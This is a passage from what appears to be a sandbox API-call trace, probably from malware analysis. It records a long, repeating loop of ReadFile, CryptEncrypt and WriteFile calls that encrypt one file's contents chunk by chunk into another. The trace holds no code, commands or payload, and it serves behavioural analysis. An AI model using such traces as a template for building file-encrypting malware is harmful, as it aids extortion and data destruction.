[0271.035] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.035] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.035] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.036] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.036] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.037] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.037] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.037] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.037] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.037] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.037] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.037] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.038] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.038] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.039] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.039] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.039] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.039] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.039] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.040] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.040] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.041] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.041] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.042] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.042] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.042] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.042] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.042] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.043] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.043] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.043] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.043] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.043] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.044] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.044] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.045] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.045] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.046] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.046] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, 